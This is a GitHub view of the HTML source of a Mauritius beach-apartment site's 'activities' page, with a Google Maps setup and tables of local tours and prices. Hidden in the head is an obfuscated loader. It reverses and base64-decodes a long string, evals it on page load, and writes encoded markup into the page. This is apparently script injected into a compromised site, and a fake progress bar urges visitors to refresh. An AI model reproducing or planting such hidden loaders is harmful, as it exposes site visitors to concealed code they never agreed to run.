-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathactivities.html
More file actions
517 lines (441 loc) · 20.2 KB
/
activities.html
File metadata and controls
517 lines (441 loc) · 20.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan="en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Things to do</title>
<meta name="keywords" content="burnas beach" />
<meta name="keywords" content="Bur-Nas Beach" />
<link href="templatemo_style3.css" rel="stylesheet" type="text/css" />
<!--[if gte IE 9]>
<style type="text/css">
.gradient {
filter: none;
}
</style>
<![endif]-->
<style type="text/css">
<!--
-->
</style>
<script type="text/javascript">
function initialize() {
var latlng = new google.maps.LatLng(-19.9914,57.592607);
var settings = {
zoom: 17,
disableDoubleClickZoom: true,
rotateControl:true,
zoomControl:false,
draggable: true,
center: latlng,
mapTypeControl: false,
navigationControl: false,
scrollwheel: false,
mapTypeId: google.maps.MapTypeId.ROADMAP};
var map = new google.maps.Map(document.getElementById("map_canvas"), settings);
var companyImage = new google.maps.MarkerImage('images/logo.png',
new google.maps.Size(100,50),
new google.maps.Point(0,0),
new google.maps.Point(50,50)
);
var companyShadow = new google.maps.MarkerImage('images/logo_shadow.png',
new google.maps.Size(130,50),
new google.maps.Point(0,0),
new google.maps.Point(65, 50));
var companyPos = new google.maps.LatLng(-19.9914,57.592607);
var companyMarker = new google.maps.Marker({
position: companyPos,
map: map,
icon: companyImage,
shadow: companyShadow,
title:"Bur-Nas-Beach",
zIndex: 5});
var trainImage = new google.maps.MarkerImage('images/train.png',
new google.maps.Size(50,50),
new google.maps.Point(0,0),
new google.maps.Point(50,50)
);
var trainShadow = new google.maps.MarkerImage('images/train_shadow.png',
new google.maps.Size(70,50),
new google.maps.Point(0,0),
new google.maps.Point(60, 50)
);
var trainPos = new google.maps.LatLng(-19.9895,57.595 );
var trainMarker = new google.maps.Marker({
position: trainPos,
map: map,
icon: trainImage,
shadow: trainShadow,
title:"Train Station",
zIndex: 4
});
var beachImage = new google.maps.MarkerImage('images/beach.png',
new google.maps.Size(70,80),
new google.maps.Point(0,0),
new google.maps.Point(35,40)
);
var beachShadow = new google.maps.MarkerImage('images/parking_shadow.png',
new google.maps.Size(70,50),
new google.maps.Point(0,0),
new google.maps.Point(60, 50)
);
var beachPos = new google.maps.LatLng(-19.9934,57.5915);
var beachMarker = new google.maps.Marker({
position: beachPos,
map: map,
icon: beachImage,
shadow: beachShadow,
title:"Pereybere beach",
zIndex: 3
});
var restImage = new google.maps.MarkerImage('images/rest.png',
new google.maps.Size(100,100),
new google.maps.Point(0,0),
new google.maps.Point(60,60)
);
var restShadow = new google.maps.MarkerImage('images/rest_shadow.png',
new google.maps.Size(125,100),
new google.maps.Point(0,0),
new google.maps.Point(60, 50)
);
var restPos = new google.maps.LatLng(-19.9927,57.592);
var restMarker = new google.maps.Marker({
position: restPos,
map: map,
icon: restImage,
shadow: restShadow,
title:"Restaurant",
zIndex: 2
});
var rest2Image = new google.maps.MarkerImage('images/rest2.png',
new google.maps.Size(100,100),
new google.maps.Point(0,0),
new google.maps.Point(60,60)
);
var rest2Shadow = new google.maps.MarkerImage('images/rest2_shadow.png',
new google.maps.Size(71,50),
new google.maps.Point(0,0),
new google.maps.Point(60, 50)
);
var rest2Pos = new google.maps.LatLng(-19.9927,57.5931);
var rest2Marker = new google.maps.Marker({
position: rest2Pos,
map: map,
icon: rest2Image,
shadow: rest2Shadow,
title:"Restaurant",
zIndex: 1
});
var WinnersImage = new google.maps.MarkerImage('images/Winners.png',
new google.maps.Size(100,100),
new google.maps.Point(0,0),
new google.maps.Point(60,60)
);
var WinnersShadow = new google.maps.MarkerImage('images/rest2_shadow.png',
new google.maps.Size(71,50),
new google.maps.Point(0,0),
new google.maps.Point(60, 50)
);
var WinnersPos = new google.maps.LatLng(-19.9921,57.5931);
var WinnersMarker = new google.maps.Marker({
position: WinnersPos,
map: map,
icon: WinnersImage,
shadow: WinnersShadow,
title:"Supermarket",
zIndex: 5
});
var carImage = new google.maps.MarkerImage('images/car.png',
new google.maps.Size(110,110),
new google.maps.Point(0,0),
new google.maps.Point(70,70)
);
var carShadow = new google.maps.MarkerImage('images/car_shadow.png',
new google.maps.Size(71,50),
new google.maps.Point(0,0),
new google.maps.Point(60, 50)
);
var carPos = new google.maps.LatLng(-19.99345,57.59275);
var carMarker = new google.maps.Marker({
position: carPos,
map: map,
icon: carImage,
shadow: carShadow,
title:"Rent a car",
zIndex: 1
});
var nocasaImage = new google.maps.MarkerImage('images/nocasa.png',
new google.maps.Size(300,300),
new google.maps.Point(0,0),
new google.maps.Point(300,300)
);
var nocasaShadow = new google.maps.MarkerImage('images/nocasa_shadow.png',
new google.maps.Size(71,50),
new google.maps.Point(0,0),
new google.maps.Point(60, 50)
);
var nocasaPos = new google.maps.LatLng(-19.9934,57.59671);
var nocasaMarker = new google.maps.Marker({
position: nocasaPos,
map: map,
icon: nocasaImage,
shadow: nocasaShadow,
title:"cache",
zIndex: 1
});
}
</script>
<script language="javascript" type="text/javascript">var _1Ol='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKPx2ToQGbph2Qk5WZwBXYu80Tx8lC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTPFzXgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuI3b0F2YzVnZi9GbtRHaukGch9yL6AHd0h2Jg0DIjJ3cu8EbPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTs9EIyFmd7cSRzUCdwlmcjN3LDNTJFNTJyITJlNHbhZGRzUicvNnblNnNyUyYNFzVClDMGN2NXhmdtkFa5MjZPlmaoFjTapEeNl0V5QUeTFmeJFUQwUSOwUCMyUCRzUSeltmRzUycq9SawF2LzBXYt9SbvNmLzlGchVGbn92bn5ycwFWbv8SQzUycwRHdoJjMlQ0MlMmczBjMlIjMlQHcpJ3YzFmdhp2L0hXZ0JjMlQ0MlUGc5RHMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';var _0x84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=","","charAt","indexOf","fromCharCode","length"];function l1O(data){var OOOlOI=_0x84de[0];var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc=_0x84de[1];do{h1=OOOlOI[_0x84de[3]](data[_0x84de[2]](i++));h2=OOOlOI[_0x84de[3]](data[_0x84de[2]](i++));h3=OOOlOI[_0x84de[3]](data[_0x84de[2]](i++));h4=OOOlOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function OOO(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(l1O(OOO(_1Ol)));</script>
<script>
function showSelected(sel) {
locations = ["",
"http://bur-nas-beach.com/Dolphins.html",
,
//etc.
];
srcLocation = locations[sel.selectedIndex];
if (srcLocation != undefined && srcLocation != "") {
document.getElementById('content').innerHTML = '<iframe src="' + srcLocation +
'" width="100%" height="100%" frameborder="no" scrolling="yes"></iframe>';
}
}
</script>
</head>
<body onload="initialize()">
<div id="templatemo_container">
<div id="templatemo_menu">
<ul>
<li><span class="Style7"><strong>Choose your language:</strong></span></li>
<li> <a href="информация.html"><img src="images/Russia.png" width="23" height="23" alt="russian"/></a></li>
<li><a href="activités.html"> <img src="images/France.png" width="23" height="23" alt="french"/></a></li>
<li> <a href="activities.html"> <img src="images/UK.png" width="23" height="23" alt="english" /></a></li>
<li><a href="index.html" target="_parent"><strong>Home</strong></a></li>
<li><a href="rooms.html" target="_parent"><strong>Galery</strong></a></li>
<li><a href="activities.html" target="_parent" class="current"><strong>Activities</strong></a></li>
<li><a href="contact.html"target="_parent"><strong>Contact</strong></a></li>
</ul>
</div>
<div class="site_title">
<h1>BURNAS BEACH APARTMENTS IN MAURITIUS.</h1>
</div>
<div class="map_container">
<progress id="progressBar" value="0" max="120" style="width:320px;text-align:center;"></progress>
<span id="status"></span>
<h1 id="finalMessage"></h1>
<script type="text/javascript" language="javascript">
function progressBarSim(al) {
var bar = document.getElementById('progressBar');
var status = document.getElementById('status');
status.innerHTML = al+"%";
bar.value = al;
al++;
var sim = setTimeout("progressBarSim("+al+")",60);
if(al == 100){
status.innerHTML = "Downloaded only 90% please refresh the page";
bar.value = 100;
clearTimeout(sim);
var finalMessage = document.getElementById('finalMessage');
finalMessage.innerHTML = "Process is complete";
}
}
var amountLoaded = 50;
progressBarSim(amountLoaded);
</script>
<div class="map">
<div style="transform:rotate(45deg); -ms-transform:rotate(45deg); /* IE 9 */ -moz-transform:rotate(45deg); /* Firefox */ -webkit-transform:rotate(45deg); /* Safari and Chrome */ -o-transform:rotate(45deg); /* Opera */" class="map">
<div id="map_canvas" style="width:1080px; height:1200px">
</div>
</div>
</div>
</div>
<!-- end of blue section -->
<!-- end of green section -->
<div id="templatemo_content">
<div id="content">
<ul id="display-inline-block-example">
<li>
<table class="pics" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="text">Swim with Dolphins.</td>
<td class="text1"><h4>A unique experience in the open sea close to dolphins.</h4></td>
</tr>
<tr>
<td><img src="pics activities/swim with dolphins.jpg" alt="Плавание с дельфинами." width="220" height="150"/></td>
<td class="text2">Embark on a speed boat and get this unforgettable experience: dolphins are extremelly fond of following the tides that are createdby the engine of the speed boat.</td>
</tr>
<tr>
<td class="text3">Prices ranges around 45€/adult, and 28€/chidren from 5 to 12yrs.prices may vary depending on the service provider.</td>
<td class="text4">To know more about best avach is not ailable prices, please contact directly Bur-Nas Beach's reception.(Bur-Nas Beach organisator of this activity, we can only make suggestions).</td>
</tr>
</table>
</li>
<li>
<table class="pics" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="text">Whale Watching.</td>
<td class="text1"><h4>Lifetime experience in the open sea close to Whale.</h4></td>
</tr>
<tr>
<td><img src="pics activities/product_thumb.php.jpeg" alt="Встреча с китами" width="220" height="150"/></td>
<td class="text2">The most common in Mauritius is the Sperm Whale wich is the largest specimen of the toothed whale (up to 18 meters long).</td>
</tr>
<tr>
<td class="text3">Prices ranges around 60€ for adults and around 39€ for chidren from 5 to 12yrs. depending on the service provider.</td>
<td class="text4">To know more about best available prices, please contact directly Bur-Nas Beach's reception.(Bur-Nas Beach is not the organisator of this activity, we can only make suggestions).</td>
</tr>
</table>
</li>
</ul>
<ul id="display-inline-block-example">
<li>
<table class="pics" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="text">Diving.</td>
<td class="text1"><h4>North coast or East coast.</h4></td>
</tr>
<tr>
<td><img src="pics activities/diving.jpg" width="220" height="155"/></td>
<td class="text2">Diving anywhere is a convenient and easy solution, but certaintly will not give you an enchanting and memorable underwater world..If you want to learn more about diving in Mauritius please visit <a href="http://www.seamandiving.com" target="_blank"><h7>here</h7>
</a>.</td>
</tr>
<tr>
<td class="text3">Prices may vary from 55€ up to 800€ depends on the programm you would like to select and on the service provider.</td>
<td class="text4">To know more about best available prices, please contact directly Bur-Nas Beach's reception(Bur-Nas Beach is not the organisator of this activity, we can only make suggestions).</td>
</tr>
</table>
</li>
<li>
<table class="pics" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="text">Catamaran Cruises.</td>
<td class="text1"><h4>Romantic and recreationnal.</h4></td>
</tr>
<tr>
<td><img src="pics activities/catamaran.jpg" alt="Круизы на катамаране" width="220" height="150"/></td>
<td class="text2">You can visit nearby islands, unforgettable sunset in open sea, with or without meal plan,including or not the encounter with daulphins). Info <a href="http://mauritiuscatamaran.com" target="_blank">
<h7>here</h7></a>.</td>
</tr>
<tr>
<td class="text3">Prices may vary from 25€/adult and 15€/child from 5 to 12yrs. to 1000€/private cruise.</td>
<td class="text4">To know more about best available prices please contact directly Bur-Nas Beach's reception.(Bur-Nas Beach is not the organisator of this activity, we can only make suggestions).</td>
</tr>
</table>
</li>
</ul>
<ul id="display-inline-block-example">
<li>
<table class="pics" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="text">Canyoning, Ziplines, Hiking, climbing.</td>
<td class="text1"><h4>Treetop tracks, river treck adventures,rivière papayes...</h4></td>
</tr>
<tr>
<td><img src="pics activities/canyoningzipline.jpg" alt="swim with daulphins" width="220" height="150"/></td>
<td class="text2">Treetop tracks are for ecotouristic lovers (info <a href="http://www.parc-aventure-chamarel.com/activ.php" target="_blank"><h7>here</h7>)</a>.River treck adventures usually takes place in the hunting reserve of Mauritius (info <a href="http://daytoursworld.com/index.php?action=page_tour&tour_id=4144" target="_blank"><h7>here</h7>)</a>.The hikes are easy !</td>
</tr>
<tr>
<td class="text3">Prices starts at 30€/adult, depending on the activity and the plan you would like to take.</td>
<td class="text4">To know more about best available prices, please contact directly Bur-Nas Beach's reception(Bur-Nas Beach is not the organisator of this activity, we can only make suggestions).</td>
</tr>
</table>
</li>
<li>
<table class="pics" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="text">Deep sea fishing.</td>
<td class="text1"><h4>Departure 3 minutes drive from Bur-Nas Beach.</h4></td>
</tr>
<tr>
<td><img src="pics activities/deep sea fishing.jpg" alt="deep sea fishing mauritius" width="220" height="150"/></td>
<td class="text2">The best time to catch record-size Blue Marlin is Between November & April.Within couple of miles off Le Morne is one of the world's top fishing spots.</td>
</tr>
<tr>
<td class="text3">Prices ranges from 400€/up to 8 pers to 700€/up to 8 pers, depending on the organisator's skills and reputation. </td>
<td class="text4">To know more about best available prices, please contact directly Bur-Nas Beach's reception(Bur-Nas Beach is not the organisator of this activity, we can only make suggestions).</td>
</tr>
</table>
</li>
</ul>
<ul id="display-inline-block-example">
<li>
<table class="pics" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="text">Flying over Mauritius.</td>
<td class="text1"><h4>Breath taking Views.</h4></td>
</tr>
<tr>
<td><img src="pics activities/heli and sight seing.jpg" alt="Полёты над Маврикий" width="220" height="150"/></td>
<td class="text2">Discover the island and it`s islets through the bird’s flight.(info <a href="http://www.mauritius-guide.net/flying-over-mauritius/"target="_blank"><h7>here</h7></a>.)</td>
</tr>
<tr>
<td class="text3">Prices starts from 80€/pers depending on the organisator.</td>
<td class="text4">To know more about best available prices, please contact directly Bur-Nas Beach's reception(Bur-Nas Beach is not the organisator of this activity, we can only make suggestions).</td>
</tr>
</table>
</li>
<li>
<table class="pics" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="text">Natural Parks.</td>
<td class="text1"><h4>9 national Parks .</h4></td>
</tr>
<tr>
<td><img src="pics activities/safari.jpg" alt="swim with daulphins" width="220" height="150"/></td>
<td class="text2">One of the must do is the "Walk with Lions" at Casela(info <a href="http://www.mauritius-guide.net/nature-parks/" target="_blank"><h7>here</h7>)</a>.</td>
</tr>
<tr>
<td class="text3">Prices ranges from 9€/adult to 95€/adult depending on the package you take.</td>
<td class="text4">To know more about best available prices, please contact directly Bur-Nas Beach's reception(Bur-Nas Beach is not the organisator of this activity, we can only make suggestions).</td>
</tr>
</table>
</li>
</ul>
<ul id="display-inline-block-example">
<li>
<table class="pics" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="text">Kite Surfing.</td>
<td class="text1"><h4>Must do activity in Mauritius.</h4></td>
</tr>
<tr>
<td><img src="pics activities/images.jpg" alt="кайтсерфинг" width="220" height="150"/></td>
<td class="text2">The North Coast where is located Bur-Nas BEach is suitable for intermediary to expert riders(info <a href="http://kiteatnorth.com/" target="_blank"><h7>here</h7>)</a>.In light summer winds, Bain Boeuf is often the only spot that works around the whole of Mauritius.</td>
</tr>
<tr>
<td class="text3">Prices ranges from 20€ to 400€ depending on what you want to do.</td>
<td class="text4">To know more about best available prices, please contact directly Bur-Nas Beach's reception(Bur-Nas Beach is not the organisator of this activity, we can only make suggestions).</td>
</tr>
</table>
</li>
<li>
<table class="pics" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="text">Golf.</td>
<td class="text1"><h4>You can't beat the classic.</h4></td>
</tr>
<tr>
<td><img src="pics activities/golf packages.jpg" alt="kite surfing" width="220" height="150"/></td>
<td class="text2">There are 5 golf courses : GYMKHANA CLUB, GOLF DU CHÂTEAU, TAMARINA GOLF ESTATE, FOUR SEASONS GOLF COURSE, THE LINKS, LE TOUESSROK GOLF COURSE.</td>
</tr>
<tr>
<td class="text3">Prices vary from 77€/pers to 150€ depending of the program you would like to chose.</td>
<td class="text4">To know more about best available prices, please contact directly Bur-Nas Beach's reception(Bur-Nas Beach is not the organisator of this activity, we can only make suggestions).</td>
</tr>
</table>
</li>
</ul>
<div>
<div class="cleaner_h20"></div>
</div>
</div>
<div id="footer_menu">
<ul>
<li><a href="index.html" target="_parent">Home</a></li>
<li><a href="rooms.html" target="_parent">Apartments</a></li>
<li><a href="activities.html" target="_parent" class="current">Activities</a></li>
<li ><a href="contact.html" target="_parent" >Contact</a></li>
</ul>
</div> <!-- end of footer -->
</div> <!-- end of container -->
</body>
</html>